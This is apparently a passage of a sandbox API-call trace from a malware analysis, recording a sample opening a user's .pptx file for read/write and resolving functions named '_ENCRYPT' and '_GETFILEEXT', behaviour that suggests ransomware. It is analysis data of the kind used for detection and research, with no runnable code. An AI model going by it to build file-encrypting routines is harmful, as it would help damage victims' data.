[0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0032.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x36) returned 0x7c2080 [0032.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", cchWideChar=54, lpMultiByteStr=0x7c2080, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx", lpUsedDefaultChar=0x0) returned 54 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.648] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5rjt0hce.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.648] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.648] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c) returned 0x7db300 [0032.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=54, lpWideCharStr=0x7db300, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Rjt0hcE.pptx") returned 54 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.649] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.649] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0032.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0032.650] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.650] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.650] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.651] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.651] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.651] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0032.652] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.652] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.652] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.653] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.653] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.653] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cdc0 [0032.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cdc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.653] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0032.653] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0032.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0032.654] CloseHandle (hObject=0x128) returned 1 [0032.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.654] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.654] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.654] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.655] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0032.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0032.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.655] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.655] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0032.655] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.655] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0032.655] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0032.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", 